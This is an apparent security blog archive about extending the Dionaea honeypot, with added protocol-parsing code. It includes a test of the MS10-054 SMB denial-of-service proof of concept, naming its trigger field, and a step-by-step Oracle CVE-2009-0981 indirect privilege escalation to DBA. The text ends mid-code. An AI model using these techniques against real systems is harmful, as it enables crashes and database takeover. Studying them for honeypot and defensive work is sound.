Sunday, May 8, 2011

ATSVC support for Dionaea

For SMB/NetBIOS attacks, one of the usual ways to execute a payload on the remote machine is through the Task Scheduler. On Windows, the 'at' command schedules a task to run at a given time. For example:

To view the scheduled tasks on a remote machine:
-at \\ip

To schedule a command to run at 23:00 on the remote machine:
-at \\ip 23:00 command

Recently I took a look at the possibility of adding ATSVC service support to Dionaea, as mentioned by Markus in his blog when observing the MS11-020 vulnerability: http://carnivore.it/2011/04/19/rumors. As usual, after a couple of checks against MSDN and Wireshark, it was interesting to observe the difference between a legitimate connection and Dionaea's response.

Legitimate SMB connection between 2 Windows machines:
1. Negotiate Protocol Request/Response
2. Session Setup AndX Request/Response with NTLMSSP authentication
3. Tree Connect AndX Request/Response
4. NT Create AndX Request/Response
5. Trans2 Request/Response ...

Connection between a Windows machine and Dionaea:
1. Negotiate Protocol Request/Response
2. Session Setup AndX Request/Response with NTLMSSP authentication
3. Tree Connect AndX Request/Response
4. Tree Disconnect Request/Response

The connection is terminated after this response. How can that be?!

I spent quite some time figuring out the root cause of the issue, checking every single packet layer, field value and so on. After a long time of tweaking and troubleshooting, on the edge of nearly giving up, the NBNS queries and responses that are transferred even before the SMB negotiation caught my attention. I noticed that at.exe needs NetBIOS protocol support, which is currently not available in Dionaea. Dionaea mainly supports the SMB protocol, which runs on port TCP/445, whereas at.exe requires NetBIOS name service support, which runs on port UDP/137.

To execute at.exe remotely over the network, the normal connection flow is as follows:
1. NBNS queries/responses
2. Negotiate Protocol Request/Response
3. Session Setup AndX Request/Response with NTLMSSP authentication
4. Tree Connect AndX Request/Response
.....[continue]

In the initial stage, several NBNS (NetBIOS Name Service) queries are exchanged on port UDP/137 before the SMB negotiation takes place. I believe that at.exe, as one of the legacy binaries that has existed since Windows NT, depends on the NBNS queries to decide whether to continue with further action. The culprit is found.
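As an added illustration (my own code, not part of the original post and not Dionaea's), here is what those UDP/137 packets look like in Python: a builder for the NBNS query, a parser for the node status response a host sends back, and a builder for that response so the parser can be exercised offline. The wire formats follow RFC 1001/1002. The host name DIONAEA, the workgroup and the MAC address in the sample are assumed, and the post above does not say which NBNS query at.exe issues; the example uses the wildcard node status query, the one nbtstat -A sends when it is given an IP address rather than a name.

```python
"""NBNS (NetBIOS Name Service, UDP/137) query builder and node status
response parser. Added example, not Dionaea's own code; wire formats follow
RFC 1001/1002. The sample response at the bottom is constructed by hand."""
import socket
import struct

NB_TYPE = 0x0020      # NetBIOS name query (resolve name -> IP)
NBSTAT_TYPE = 0x0021  # node status request (what "nbtstat -A <ip>" sends)
IN_CLASS = 0x0001


def encode_netbios_name(name, suffix=0x00):
    """First-level encoding (RFC 1001 14.1): pad the name to 15 bytes, append
    the 16th (suffix) byte, then spell each nibble as a letter A..P."""
    pad = b"\x00" if name == "*" else b" "   # the wildcard name is NUL-padded
    raw = name.upper().encode("ascii")[:15].ljust(15, pad) + bytes([suffix])
    return bytes(c for b in raw for c in (0x41 + (b >> 4), 0x41 + (b & 0x0F)))


def decode_netbios_name(encoded):
    """Inverse of encode_netbios_name(); returns (name, suffix)."""
    raw = bytes(((encoded[i] - 0x41) << 4) | (encoded[i + 1] - 0x41)
                for i in range(0, 32, 2))
    return raw[:15].decode("ascii").rstrip(" \x00"), raw[15]


def build_query(name, qtype, txid=0x1234, broadcast=False):
    """NBNS query: 12-byte header and one question (0x20 length byte, 32
    encoded bytes, 0x00 terminator, QTYPE, QCLASS). '*' with NBSTAT_TYPE asks
    a host for the names it owns; a name with NB_TYPE asks who owns it."""
    flags = 0x0000                           # opcode 0 = query, R bit clear
    if broadcast:
        flags |= 0x0010                      # B bit: broadcast name query
    if qtype == NB_TYPE:
        flags |= 0x0100                      # RD is set on name queries only
    header = struct.pack(">HHHHHH", txid, flags, 1, 0, 0, 0)
    qname = b"\x20" + encode_netbios_name(name) + b"\x00"
    return header + qname + struct.pack(">HH", qtype, IN_CLASS)


def parse_node_status_response(data):
    """Parse a NODE STATUS RESPONSE (RFC 1002 4.2.18): header, RR_NAME,
    RR_TYPE/RR_CLASS/TTL/RDLENGTH, NUM_NAMES entries of 16-byte name plus
    2-byte NAME_FLAGS, then STATISTICS starting with the 6-byte unit id."""
    txid, flags, _qd, an, _ns, _ar = struct.unpack(">HHHHHH", data[:12])
    if not flags & 0x8000:
        raise ValueError("not a response")
    if flags & 0x000F:
        raise ValueError("NBNS error, RCODE %d" % (flags & 0x000F))
    if an != 1 or data[12] != 0x20:
        raise ValueError("unexpected answer layout")
    off = 12 + 34                            # skip RR_NAME (1 + 32 + 1 bytes)
    rr_type, _rr_class, _ttl, rdlen = struct.unpack_from(">HHIH", data, off)
    if rr_type != NBSTAT_TYPE:
        raise ValueError("RR_TYPE 0x%04x is not NBSTAT" % rr_type)
    rdata = data[off + 10:off + 10 + rdlen]
    names, p = [], 1
    for _ in range(rdata[0]):
        entry = rdata[p:p + 16]
        name_flags, = struct.unpack_from(">H", rdata, p + 16)
        names.append((entry[:15].decode("ascii").rstrip(), entry[15], name_flags))
        p += 18
    mac = ":".join("%02x" % b for b in rdata[p:p + 6])
    return {"txid": txid, "names": names, "mac": mac}


def build_node_status_response(txid, names, mac):
    """What a host (or a honeypot emulating one) answers to the wildcard
    NBSTAT query. names = [(name, suffix, NAME_FLAGS)]; NAME_FLAGS 0x0400 is
    an active unique name, 0x8400 an active group name."""
    rdata = bytes([len(names)])
    for name, suffix, name_flags in names:
        rdata += (name.upper().encode("ascii")[:15].ljust(15) + bytes([suffix])
                  + struct.pack(">H", name_flags))
    rdata += mac + bytes(40)                 # STATISTICS: unit id + zeroed counters
    header = struct.pack(">HHHHHH", txid, 0x8400, 0, 1, 0, 0)   # response, AA set
    rr_name = b"\x20" + encode_netbios_name("*") + b"\x00"
    rr = struct.pack(">HHIH", NBSTAT_TYPE, IN_CLASS, 0, len(rdata))
    return header + rr_name + rr + rdata


def node_status_query(ip, timeout=2.0):
    """Send the wildcard node status query to ip:137 and parse the reply.
    Network path; not exercised by the offline sample below."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(build_query("*", NBSTAT_TYPE), (ip, 137))
        reply, _ = s.recvfrom(1024)
    return parse_node_status_response(reply)


# Constructed sample: assumed host DIONAEA in WORKGROUP with a made-up MAC.
SAMPLE_RESPONSE = build_node_status_response(
    0xBEEF,
    [("DIONAEA", 0x00, 0x0400), ("DIONAEA", 0x20, 0x0400),
     ("WORKGROUP", 0x00, 0x8400)],
    bytes.fromhex("080027aabbcc"))
```

Running node_status_query("192.168.56.101") against a host that answers on UDP/137 returns the same dictionary shape the sample produces; a host that does not answer at all (as Dionaea did not at the time) simply times out, which is the point at which at.exe gives up.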

Screenshot:
Legitimate connection of 2 Windows hosts

Failed connection of a Windows host and Dionaea


Move on.

Friday, January 14, 2011

Dionaea SIP module test

Here is the listing of my test of the Dionaea SIP module with SIPVicious. SIPVicious is one of the de facto SIP auditing tools for VoIP systems. The test was performed with svmap.py, specifying some of the common request methods that a legitimate VoIP system supports.

I have listed the SIPVicious output, followed by Dionaea's response to each method:


C:\sipvicious>python svmap.py -s session1 -v 192.168.56.101

INFO:DrinkOrSip:Db does sync
INFO:DrinkOrSip:trying to get self ip .. might take a while
INFO:root:start your engines
INFO:DrinkOrSip:unknown:unknown -> 192.168.56.101:5060 -> unknown
-> 3CXPhoneSystem
INFO:root:we have 1 devices
| SIP Device | User Agent | Fingerprint |
-----------------------------------------------------
| 192.168.56.101:5060 | unknown | 3CXPhoneSystem |

INFO:root:Total time: 0:00:03.223000

C:\sipvicious>python svmap.py -m OPTIONS 192.168.56.10

| SIP Device | User Agent | Fingerprint |
-----------------------------------------------------
| 192.168.56.101:5060 | unknown | 3CXPhoneSystem |

C:\sipvicious>python svmap.py -m CANCEL 192.168.56.101

| SIP Device | User Agent | Fingerprint |
-----------------------------------------------------
| 192.168.56.101:5060 | unknown | Viceroy 1.2 / T-Com Speedport W500V / Firmware v1.37 |
| | | MxSF/v3.2.6.26 / ET747-a3 |

[14012011 00:11:13] sip dionaea/sip.py:1118: Received CANCEL
[14012011 00:11:15] connection connection.c:3825: connection 0x9b35cb8 none/udp/none [192.168.56.101:5060->192.168.56.1:5060] state: none->close
[14012011 00:11:15] connection connection.c:3825: connection 0x9b35cb8 none/udp/close [192.168.56.101:5060->192.168.56.1:5060] state: close->close
[14012011 00:11:15] logsql dionaea/logsql.py:574: attackid 21567 is done

Note: Wireshark shows the packet as malformed.


C:\sipvicious>python svmap.py -m REGISTER 192.168.56.101

WARNING:root:found nothing

C:\sipvicious>python svmap.py -m INVITE 192.168.56.101

WARNING:root:found nothing
[14012011 00:08:33] sip dionaea/sip.py:833: SIP Session created
[14012011 00:08:33] sip dionaea/sip.py:975: Received INVITE
[14012011 00:08:33] sip dionaea/sip.py:1183: Mandatory header content-type not in message

C:\sipvicious>python svmap.py -m ACK 192.168.56.101

WARNING:root:found nothing
[14012011 00:10:55] sip dionaea/sip.py:833: SIP Session created
[14012011 00:10:55] sip dionaea/sip.py:1061: Received ACK
[14012011 00:10:55] sip dionaea/sip.py:1069: Given Call-ID does not belong to any session: exit

C:\sipvicious>python svmap.py -m BYE 192.168.56.101

WARNING:root:found nothing
[14012011 00:12:42] sip dionaea/sip.py:833: SIP Session created
[14012011 00:12:42] sip dionaea/sip.py:1101: Received BYE
[14012011 00:12:42] sip dionaea/sip.py:1109: Given Call-ID does not belong to any session: exit

C:\sipvicious>python svmap.py -m PRACK 192.168.56.101

WARNING:root:found nothing

C:\sipvicious>python svmap.py -m SUBSCRIBE 192.168.56.101

WARNING:root:found nothing

C:\sipvicious>python svmap.py -m NOTIFY 192.168.56.101

WARNING:root:found nothing

C:\sipvicious>python svmap.py -m PUBLISH 192.168.56.101

WARNING:root:found nothing

C:\sipvicious>python svmap.py -m INFO 192.168.56.101
WARNING:root:found nothing

C:\sipvicious>python svmap.py -m REFER 192.168.56.101

WARNING:root:found nothing

C:\sipvicious>python svmap.py -m UPDATE 192.168.56.101
WARNING:root:found nothing

C:\sipvicious>python svmap.py -m MESSAGE 192.168.56.101

WARNING:root:found nothing

[14012011 00:16:27] sip dionaea/sip.py:966: Unknown SIP header (supported: INVITE, ACK, OPTIONS, BYE, CANCEL, REGISTER and SIP responses

From this quick test, the current Dionaea SIP module handles the OPTIONS and CANCEL methods well. Several SIP methods can be improved in the Dionaea SIP module, such as INVITE, ACK, BYE and REGISTER, including support for the request and replying with the correct response. I will work on it soon.
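To show what "the correct response" means for each of those methods, here is an added example (my own code, not Dionaea's sip.py): a small SIP request parser plus an endpoint that answers OPTIONS and REGISTER, tracks INVITE dialogs by Call-ID, rejects BYE and CANCEL for unknown calls with 481, rejects unsupported methods with 501, and silently drops a stray ACK. The request builder at the end fabricates svmap-style messages so everything runs offline. One caveat: the Content-Type check on INVITE mirrors the Dionaea log line above, not RFC 3261, which allows an INVITE without a body.

```python
"""Minimal SIP request parser and method dispatcher that answers the way a
standards-following endpoint would. Added example, not Dionaea's sip.py; the
request builder at the bottom imitates the messages svmap sends (constructed)."""
import re

SUPPORTED_METHODS = ("INVITE", "ACK", "OPTIONS", "BYE", "CANCEL", "REGISTER")
MANDATORY_HEADERS = ("via", "from", "to", "call-id", "cseq")
COMPACT = {"v": "via", "f": "from", "t": "to", "i": "call-id", "m": "contact",
           "c": "content-type", "l": "content-length", "s": "subject"}
REQUEST_LINE = re.compile(r"^([A-Z]+) (\S+) SIP/2\.0$")


class SipError(Exception):
    def __init__(self, code, reason):
        super().__init__("%d %s" % (code, reason))
        self.code, self.reason = code, reason


def parse_request(raw):
    """Split a SIP request into (method, uri, headers, body). Header names are
    lower-cased and compact forms expanded; values are kept as lists because
    Via and Route may repeat."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    m = REQUEST_LINE.match(lines[0])
    if not m:
        raise SipError(400, "Bad Request-Line")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if not sep:
            raise SipError(400, "Malformed header")
        name = name.strip().lower()
        headers.setdefault(COMPACT.get(name, name), []).append(value.strip())
    for h in MANDATORY_HEADERS:
        if h not in headers:
            raise SipError(400, "Mandatory header %s not in message" % h)
    return m.group(1), m.group(2), headers, body


class SipEndpoint:
    """Tracks dialogs by Call-ID so ACK/BYE/CANCEL can be matched to an INVITE."""

    def __init__(self):
        self.sessions = {}

    def handle(self, raw):
        """Return (status_code, reason) for the reply, or None when the request
        gets no reply at all (ACK)."""
        try:
            method, _uri, headers, body = parse_request(raw)
            if method not in SUPPORTED_METHODS:
                return 501, "Not Implemented"   # svmap's MESSAGE, INFO, ... land here
            handler = getattr(self, "on_" + method.lower())
            return handler(headers["call-id"][0], headers, body)
        except SipError as e:
            return e.code, e.reason

    def on_options(self, call_id, headers, body):
        return 200, "OK"

    def on_register(self, call_id, headers, body):
        return 200, "OK"

    def on_invite(self, call_id, headers, body):
        # Dionaea's check from the log above; RFC 3261 itself allows a bodiless INVITE.
        if "content-type" not in headers:
            raise SipError(400, "Mandatory header content-type not in message")
        self.sessions[call_id] = "ringing"
        return 180, "Ringing"

    def on_ack(self, call_id, headers, body):
        if call_id in self.sessions:             # unknown Call-ID: log and drop
            self.sessions[call_id] = "confirmed"
        return None                               # ACK is never answered

    def on_bye(self, call_id, headers, body):
        if call_id not in self.sessions:
            raise SipError(481, "Call/Transaction Does Not Exist")
        del self.sessions[call_id]
        return 200, "OK"

    def on_cancel(self, call_id, headers, body):
        if self.sessions.get(call_id) != "ringing":   # CANCEL only applies to a pending INVITE
            raise SipError(481, "Call/Transaction Does Not Exist")
        del self.sessions[call_id]
        return 200, "OK"


def sip_request(method, call_id, extra_headers=(), body=""):
    """Constructed request in the shape svmap sends; addresses are the ones
    from the test above."""
    lines = ["%s sip:100@192.168.56.101 SIP/2.0" % method,
             "Via: SIP/2.0/UDP 192.168.56.1:5060;branch=z9hG4bK-1",
             'From: "100"<sip:100@192.168.56.1>;tag=1',
             'To: "100"<sip:100@192.168.56.101>',
             "Call-ID: %s" % call_id,
             "CSeq: 1 %s" % method,
             "Content-Length: %d" % len(body)] + list(extra_headers)
    return "\r\n".join(lines) + "\r\n\r\n" + body
```

SipEndpoint().handle(sip_request("INVITE", "x@192.168.56.1")) reproduces the "Mandatory header content-type not in message" case, and a BYE or CANCEL with a Call-ID the endpoint has never seen gets 481 instead of Dionaea's silent "exit".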

Reference:
How to use svmap
http://code.google.com/p/sipvicious/wiki/SvmapUsage
List of SIP request methods
http://en.wikipedia.org/wiki/SIP_Requests

Monday, November 22, 2010

MS10-054 Microsoft Windows SRV.SYS SrvSmbQueryFsInformation Pool Overflow DoS

Another SMB protocol vulnerability that caught my eye these few days: MS10-054, Microsoft Windows SRV.SYS SrvSmbQueryFsInformation Pool Overflow DoS. My curiosity is the same as always: how does it work?

This vulnerability was first discovered by Laurent Gaffié in early 2010. He had also discovered the MS10-020 vulnerability previously. Summary from the advisory:

"A vulnerability in the Windows kernel can be triggered via SMB in Microsoft Windows versions ranging from Windows 2000 through to Windows 7. This vulnerability allows an attacker to trigger a kernel pool corruption by sending a specially crafted SMB_COM_TRANSACTION2 request. Successful exploitation of this issue may result in remote code execution with kernel privileges, while failed attempts will result in a Denial of Service condition. Microsoft has published a patch to resolve the issue"

What is SMB_COM_TRANSACTION2 ?
From [MS-CIFS].pdf, SMB_COM_TRANSACTION2 subcommands provide support for a richer set of server-side file system semantics. The "Trans2 subcommands", as they are called, allow clients to set and retrieve Extended Attribute key/value pairs, make use of long file names (longer than the original 8.3 format names), and perform directory searches, among other tasks.

The list of subcommands can be found at http://manubatbat.free.fr/doc/smb/6.2.htm

The original SMB_COM_TRANSACTION2 request has this format:

SMB_Parameters
{
UCHAR WordCount;
Words
{
USHORT TotalParameterCount;
USHORT TotalDataCount;
USHORT MaxParameterCount;
USHORT MaxDataCount;
UCHAR MaxSetupCount;
UCHAR Reserved1;
USHORT Flags;
ULONG Timeout;
USHORT Reserved2;
USHORT ParameterCount;
USHORT ParameterOffset;
USHORT DataCount;
USHORT DataOffset;
UCHAR SetupCount;
UCHAR Reserved3;
USHORT Setup[SetupCount];
}
}
SMB_Data
{
USHORT ByteCount;
Bytes
{
SMB_STRING Name;
UCHAR Pad1[];
UCHAR Trans2_Parameters[ParameterCount];
UCHAR Pad2[];
UCHAR Trans2_Data[DataCount];
}
}

How does MS10-054 work?
The culprit is the MaxDataCount field. It indicates the maximum number of data bytes that the client will accept in the transaction reply. srv.sys allocates a pool chunk of MaxDataCount bytes without any sanity check on the value. A request with MaxDataCount = 0 therefore makes the server allocate a zero-sized pool chunk; the reply data it then writes into that chunk overflows into the adjacent pool memory, and the resulting pool corruption is hit when the chunk is freed.

The PoC can be found in the full-disclosure advisory http://seclists.org/fulldisclosure/2010/Aug/122 . I have tried to test the PoC and it works when the target machine is in the "WORKGROUP" domain and has a user named "Y0" (0 is the zero).

C:\Python26>python.exe test.py 192.168.56.101 C
[+]Negotiate Protocol Request sent
[+]Session Query sent

C:\Python26>python.exe test.py 192.168.56.101 C
[+]Negotiate Protocol Request sent
[+]Session Query sent
[+]Malformed Trans2 packet sent
[+]The target should be down now

C:\Python26>

And the WinXP VM froze...

In the PoC packet, we can clearly see the culprit: MaxDataCount = 0.

A working module is also included in Metasploit: modules/auxiliary/dos/windows/smb/ms10_054_queryfs_pool_overflow.rb

Wednesday, November 17, 2010

VirtualBox and Vmware network setup

Just figured this out.

1. Connect VirtualBox images and VMware Player images.

Settings
VirtualBox: VirtualBox Host-Only Ethernet Adapter
VMware's setting in vmnetcfg.exe: bridged to the VirtualBox Host-Only Ethernet Adapter
VMware image: Network connection: Bridged

It works! All images can ping each other. The IPs assigned to the VM images:
- Host Machine : 192.168.56.1
- VirtualBox Ubuntu 9.04 image : 192.168.56.101
- VirtualBox Ubuntu 9.10 image : 192.168.56.102
- VMWare Backtrack image : 192.168.56.103

Traffic between the images can be captured with Wireshark listening on the VirtualBox Host-Only adapter. One drawback is that the Internet connection does not work for any of the images, although the host machine can access the Internet without problems.

Let's improve it.

2. Create an internal network for 2 VirtualBox images + Internet

Settings
Virtual Box Ubuntu 9.04 image
- Enable 2 Network Adapters
- Setting for Adapter 1 : NAT
- Setting for Adapter 2 :
 Attached to "Internal Network", Name:"intnet"
IP setting: 192.168.4.1
Subnet mask : 255.255.255.0
Gateway : 10.0.3.2 (the same as the NAT gateway)

Virtual Box Ubuntu 9.10 image
- Enable 2 Network Adapters
- Setting for Adapter 1 : NAT
- Setting for Adapter 2 :
 Attached to "Internal Network", Name:"intnet"
IP setting : 192.168.4.2
Subnet mask : 255.255.255.0
Gateway : 10.0.3.2 (the same as the NAT gateway)

Both images can access the Internet and ping each other, and most importantly it is an internal network. The packets cannot be captured with Wireshark listening on the host machine, unless Wireshark is listening inside the VM images.

Reference
https://opensourceexperiments.wordpress.com/2008/04/13/case-study-configuring-internal-networking-work-for-talking-two-linux-guest-os-ubuntu-on-windows-vista-host/

Monday, November 15, 2010

Simple steps to improve Dionaea SMB stack

The SMB protocol is one of the core protocols supported by Dionaea. Attacks on port 445 are received and logged in the SQLite database. Dionaea emulates the SMB protocol, and the related functions in the SMB stack are written in Python. If you are running Dionaea and you find unsupported RPC calls, you are most welcome to improve Dionaea's SMB stack.

This is how I work it out. The process:
1. Dig out the unsupported function, in this case an unsupported RPC call
2. Refer to the MSDN Library for further details about the function call
3. Find an application or test suite that can trigger the function. Observe the original request and reply of the function, using a clean Windows image
4. Code it!
5. Test, debug, test, debug, BINGO!!
6. Commit to the tree

Example:
1. Recently I found that these lines kept appearing in /opt/dionaea/var/log/dionaea.log, and I realised that this unsupported RPC SRVSVC call with opnum 21 hit my sensor frequently.
[13112010 09:02:07] rpcservices dionaea/smb/rpcservices.py:104-info: 
Unknown RPC Call to SRVSVC 21
.....
[13112010 12:21:37] rpcservices dionaea/smb/rpcservices.py:104-info:
Unknown RPC Call to SRVSVC 21
.....
[13112010 13:38:34] rpcservices dionaea/smb/rpcservices.py:104-info:
Unknown RPC Call to SRVSVC 21
.....

Querying the database /opt/dionaea/var/dionaea/logsql.sqlite showed 68 hits of this unsupported RPC call against a sensor that had been running for no more than 72 hours.
Here is the database query result:
COUNT(*) | dcerpcrequest_uuid | dcerpcrequest_opnum | dcerpcservice_name
68 | 4b324fc8-1670-01d3-1278-5a47bf6ee188 | 21 | SRVSVC
1 | 12345778-1234-abcd-ef00-0123456789ac | 34 | samr

2. Referring to the MSDN Library (http://msdn.microsoft.com/en-us/library/cc247243%28v=PROT.13%29.aspx), opnum 21 is the NetrServerGetInfo method, used to retrieve the current configuration information of the target server. The method signature is quite simple:

NET_API_STATUS NetrServerGetInfo(
[in, string, unique] SRVSVC_HANDLE ServerName,
[in] DWORD Level,
[out, switch_is(Level)] LPSERVER_INFO InfoStruct
);

3. With some Googling, I managed to find a way to observe the original request and response of the NetServerGetInfo method. Here is a simple Win32 program that can be used to test the NetServerGetInfo method. It worked well with a clean Windows XP image as the target, and the packet details can be studied with Wireshark.
http://www.installsetupconfig.com/win32programming/networkmanagementapis16_49.html

Note: To make this simple program work, the target Windows XP needs the Guest account to be enabled. It took me quite some time to figure this out, as a System error 17XX kept appearing.

4. It is time to code the method and let Dionaea support it! The RPC methods reside in http://src.carnivore.it/dionaea/tree/modules/python/scripts/smb/rpcservices.py, clearly separated into classes such as ATSVC, DCOM, IOXIDResolver, lsarpc and others. Find the SRVSVC class and define the NetServerGetInfo handler.

5. Test the code with the Win32 program compiled previously. Observe the packets in Wireshark. Test, debug, test, debug... and it works just like the Windows image. Further testing can be done by putting it into the real network. The code works!

Observation with readlogsqltree.py:

2010-11-14 10:30:16
connection 21150 pcap tcp reject 192.168.1.50:139 <- 118.X.180.91:47775
2010-11-14 10:30:16
connection 21151 smbd tcp accept 192.168.1.50:445 <- 118.X.180.91:47774
dcerpc bind: uuid '4b324fc8-1670-01d3-1278-5a47bf6ee188'
(SRVSVC) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
dcerpc request: uuid '4b324fc8-1670-01d3-1278-5a47bf6ee188'
(SRVSVC) opnum 15 (NetShareEnum ())
dcerpc request: uuid '4b324fc8-1670-01d3-1278-5a47bf6ee188'
(SRVSVC) opnum 21 (NetServerGetInfo ())

Waiting for the next incoming attack :)

6. Commit to the tree. Example : http://src.carnivore.it/dionaea/commit/?id=974002a510a13f4565d58b458da665bd4e165e7c

7. After the commit, the added handler needs to be observed from time to time. Sometimes real-world attacks differ from what has been coded, and minor changes to certain packet fields are needed to make it work.
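As an added, self-contained illustration of what step 4 amounts to (my own code, not the commit linked above): the NDR encoding of the NetrServerGetInfo request and of a level 101 response, plus the dispatch that turns "Unknown RPC Call to SRVSVC 21" into an answer. The emulated server name, version and comment are assumed values, only info level 101 is emulated (other levels get ERROR_INVALID_LEVEL), and the DCE/RPC PDU header around the stub is left out. The request builder stands in for what the Win32 test program sends and is constructed here so the handler can be exercised offline.

```python
"""NDR encoding for SRVSVC opnum 21, NetrServerGetInfo, as an RPC handler sees
it: request stub in, response stub out. Added example, not the Dionaea commit;
only level 101 is emulated and the server name/comment are assumed values.
The DCE/RPC PDU header in front of the stub is not included."""
import struct

SRVSVC_UUID = "4b324fc8-1670-01d3-1278-5a47bf6ee188"
OPNUM_NETR_SERVER_GET_INFO = 21
NERR_SUCCESS = 0
ERROR_INVALID_LEVEL = 124
PLATFORM_ID_NT = 500
SV_TYPE_WORKSTATION, SV_TYPE_SERVER, SV_TYPE_NT = 0x1, 0x2, 0x1000

EMULATED = {"name": "DIONAEA", "comment": "", "major": 5, "minor": 1,   # assumed values
            "type": SV_TYPE_WORKSTATION | SV_TYPE_SERVER | SV_TYPE_NT}


def _pad4(b):
    return b + bytes(-len(b) % 4)


def ndr_wstr(s):
    """Conformant varying wide string: MaxCount, Offset, ActualCount (counted
    in wchar_t, NUL included), UTF-16LE characters, padding to 4 bytes."""
    n = len(s) + 1
    return _pad4(struct.pack("<III", n, 0, n) + (s + "\x00").encode("utf-16-le"))


def ndr_read_wstr(buf, off):
    """Decode a wide string at buf[off:]; returns (text, offset after padding)."""
    _maxc, _offset, actual = struct.unpack_from("<III", buf, off)
    off += 12
    text = buf[off:off + 2 * actual].decode("utf-16-le").rstrip("\x00")
    off += 2 * actual
    return text, off + (-off % 4)


def build_request(server_name, level):
    """Client side: [unique] pointer to ServerName (non-zero referent id or
    0 for NULL), the string if any, then Level."""
    if server_name is None:
        return struct.pack("<II", 0, level)
    return struct.pack("<I", 0x00020000) + ndr_wstr(server_name) + struct.pack("<I", level)


def parse_request(stub):
    ref_id, = struct.unpack_from("<I", stub, 0)
    server_name, off = None, 4
    if ref_id:
        server_name, off = ndr_read_wstr(stub, off)
    level, = struct.unpack_from("<I", stub, off)
    return server_name, level


def build_response(level, info=EMULATED):
    """SERVER_INFO union (switch_is Level): discriminant, pointer to the
    SERVER_INFO_101 arm, the struct with its two embedded string pointers,
    the two deferred strings, then the NET_API_STATUS return value."""
    if level != 101:
        return struct.pack("<III", level, 0, ERROR_INVALID_LEVEL)   # NULL arm + error
    out = struct.pack("<II", level, 0x00020000)
    out += struct.pack("<IIIIII", PLATFORM_ID_NT, 0x00020004, info["major"],
                       info["minor"], info["type"], 0x00020008)    # sv101_* fields
    out += ndr_wstr(info["name"]) + ndr_wstr(info["comment"])     # deferred referents
    return out + struct.pack("<I", NERR_SUCCESS)


def parse_response(stub):
    """Returns (level, info dict or None, status)."""
    level, ptr = struct.unpack_from("<II", stub, 0)
    off, info = 8, None
    if ptr and level == 101:
        platform, name_ptr, major, minor, sv_type, comment_ptr = \
            struct.unpack_from("<IIIIII", stub, off)
        off += 24
        name, off = ndr_read_wstr(stub, off) if name_ptr else (None, off)
        comment, off = ndr_read_wstr(stub, off) if comment_ptr else (None, off)
        info = {"platform_id": platform, "name": name, "major": major,
                "minor": minor, "type": sv_type, "comment": comment}
    status, = struct.unpack_from("<I", stub, off)
    return level, info, status


def handle_srvsvc(opnum, stub):
    """Dispatch one SRVSVC request stub; None stands for the 'Unknown RPC
    Call' case from the log above."""
    if opnum == OPNUM_NETR_SERVER_GET_INFO:
        _server_name, level = parse_request(stub)
        return build_response(level)
    return None
```

Comparing build_response(101) byte for byte against the stub Wireshark shows for a real Windows XP reply (the same order: level, pointer, six DWORDs, two strings, status) is the check that step 5 above describes; the values that differ (name, comment, version) are exactly the ones the emulation is free to choose.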

This is one of the ways to improve the SMB stack. Simple and exciting. Feel free to write yours. If you need git tree access, feel free to contact Markus at nepenthesdev@gmail.com


Cheers,

Sunday, October 31, 2010

Oracle Indirect Privilege Escalation Attack

When I came across this issue, the interesting part that caught my attention was the indirect process. To me, it is the creativity I love! Let's dive in with some basic understanding of Oracle.

What is a trigger in Oracle and how does it work?
A trigger is a named PL/SQL unit that is stored in the database and executed (fired) in response to a specified event that occurs in the database.

It can be fired at exactly one of the following timing points:
--Before the triggering statement executes
--After the triggering statement executes
--Before each row that the triggering statement affects
--After each row that the triggering statement affects

The interesting type is the 'before the triggering statement executes' trigger: it fires even if the triggering statement itself fails. For example, suppose a trigger is set up to fire on the 'DROP TABLE' command. If a restricted user issues 'DROP TABLE', he ends up with an insufficient-privilege or access-denied error, but the trigger has already fired, since it is a "before" trigger. This feature has been creatively exploited, turning it into an indirect privilege escalation, the so-called 2-stage attack.

How does Oracle indirect privilege escalation work?
Let's look at how the 2-stage attack works, using the real case of CVE-2009-0981, the Oracle 10g MDSYS.SDO_TOPO_DROP_FTBL SQL injection vulnerability.

Finding the culprit

1. Identify who the DBA is, and a table owned by him on which PUBLIC has been granted INSERT, e.g. SYSTEM.OL$ or SYSTEM.DEF$_TEMP$LOB.
2. Identify a user who possesses the "CREATE ANY TRIGGER" privilege, for example MDSYS. This means MDSYS is allowed to create a trigger in any schema, except on objects that belong to SYS.
3. Find a vulnerable trigger owned by that user, so that we can inject code into it, for example the MDSYS.SDO_TOPO_DROP_FTBL trigger, which fires on the "DROP TABLE" command. The trigger is vulnerable to code injection.

1st stage

4. Inject crafted code into the vulnerable trigger and execute it, for example "DROP TABLE ... and 1=(scott.z)"

2nd stage
5. The crafted code (scott.z, a function declared "AUTHID CURRENT_USER" so that, when called from inside the MDSYS trigger, it runs with MDSYS's privileges, including CREATE ANY TRIGGER) creates our trigger in the SYSTEM schema, for example a "before" trigger on INSERT INTO one of the tables found in step 1. Because that trigger is owned by SYSTEM, its body runs with SYSTEM's privileges, and SYSTEM holds the DBA role.
6. Execute a statement that fires the trigger, for example "insert into system.DEF$_TEMP$LOB ..."
7. Our trigger fires and the DBA role is obtained!
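An added example of turning the "finding the culprit" steps into an audit check (my own code, not from the page or the Metasploit module): given the rows returned by three catalog queries, it lists every CREATE ANY TRIGGER holder that is not itself a DBA, paired with every non-SYS, DBA-owned table that PUBLIC can INSERT into, which is precisely the combination the two stages above need. The catalog rows below are constructed, not a dump of a real instance; the column names are those of DBA_ROLE_PRIVS, DBA_TAB_PRIVS and DBA_SYS_PRIVS.

```python
"""Audit for the preconditions of the indirect (2-stage) escalation above:
a DBA-role account owning a table that PUBLIC may INSERT into (the stage 2
landing spot) and a non-DBA account holding CREATE ANY TRIGGER (the stage 1
intermediary). Added example, not from the page or the Metasploit module.
The rows below are constructed; in practice they come from the three queries
held in the constants, run as a DBA user."""

SQL_DBA_ROLE = "SELECT grantee FROM dba_role_privs WHERE granted_role = 'DBA'"
SQL_PUBLIC_INSERT = ("SELECT owner, table_name FROM dba_tab_privs "
                     "WHERE grantee = 'PUBLIC' AND privilege = 'INSERT'")
SQL_CREATE_ANY_TRIGGER = ("SELECT grantee FROM dba_sys_privs "
                          "WHERE privilege = 'CREATE ANY TRIGGER'")

# Constructed catalog rows shaped like a 10g instance (not captured from one).
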